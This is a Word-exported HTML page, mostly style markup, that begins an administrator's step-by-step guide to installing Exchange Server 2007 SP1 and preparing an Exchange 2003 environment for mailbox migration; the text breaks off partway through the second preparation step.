&lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;EN-AU&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;} @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 415 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-520092929 1073786111 9 0 415 0;} @font-face 	{font-family:"Trebuchet MS"; 	panose-1:2 11 6 3 2 2 2 2 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:647 0 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:0cm; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:36.0pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:0cm; 	margin-left:36.0pt; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:0cm; 	margin-left:36.0pt; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:36.0pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	font-size:10.0pt; 	mso-ansi-font-size:10.0pt; 	mso-bidi-font-size:10.0pt; 	mso-ascii-font-family:Calibri; 	mso-fareast-font-family:Calibri; 	mso-hansi-font-family:Calibri;} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 72.0pt 72.0pt 72.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:496652203; 	mso-list-type:hybrid; 	mso-list-template-ids:1490211140 175640376 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;} @list l0:level1 	{mso-level-start-at:0; 	mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	margin-left:27.0pt; 	text-indent:-18.0pt; 	font-family:Wingdings; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:Arial;} @list l1 	{mso-list-id:2120054891; 	mso-list-template-ids:-447608746;} @list l1:level1 	{mso-level-tab-stop:36.0pt; 	mso-level-number-position:left; 	text-indent:-18.0pt;} ol 	{margin-bottom:0cm;} ul 	{margin-bottom:0cm;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Calibri","sans-serif"; 	mso-bidi-font-family:"Times New Roman";} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-size:130%;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;" &gt;Phase 3 :- Installation of Windows Exchange server standard 2007 SP1 &amp;amp; Move Mailbox, Installtion/Transfer of Commercial Certificate&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:130%;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:12pt;"  &gt;&lt;span style="font-size:130%;"&gt;A/&lt;/span&gt;&lt;span style="font-size:130%;"&gt; &lt;/span&gt;&lt;span style="font-size:130%;"&gt;Install Exchange Pre-requisites and IIS&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Install IIS Role from Go to Start &gt; “Server Manager &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Futures Role&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Install IIS role and Please make sure you install IIS 6.0 management compatibility, IIS6 Metabase Compatibility, Digest Authentication, Dynamic content compression &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Restart the server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt; &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;     &lt;/span&gt;&lt;b style=""&gt;Install Exchange Server Prerequisite &lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Windows ServerPowerShell Management Tool &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;.NET Framework 2 OR 3.5 (**Install this first .net 1.1 sp1, .net 2) &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; MMC&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;ExchangeBPA,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Exchange2007-KB970162-x64-EN &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;And all the updates from AWD “BBN-Migration Utility” folder on AWD nas\pub&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:12pt;"  &gt;&lt;span style="font-size:130%;"&gt;B/ Prepare Current Exchange Server 2003 Std environment to install and Transfer Mailbox to Exchange server 2007 Std.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Step 1: &lt;span style=""&gt; &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;color:red;"  &gt;Raise the Microsoft Exchange Server Operational Level From Mixed Level to Native Mode&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;On the Old Exchange server Open Exchange Server manager &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; R/C on “First Organisation (Exchange)” &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Properties &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Change the Operational Level From Mixed Level to Native Mode&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Export (*.p12b) certificate from Old Exchange server with full certificate path and private key.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Step 2:&lt;/span&gt;&lt;/b&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Prepare Current Exchange server 2003 to transfer all records and schemas to new Exchange server 2007:-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span 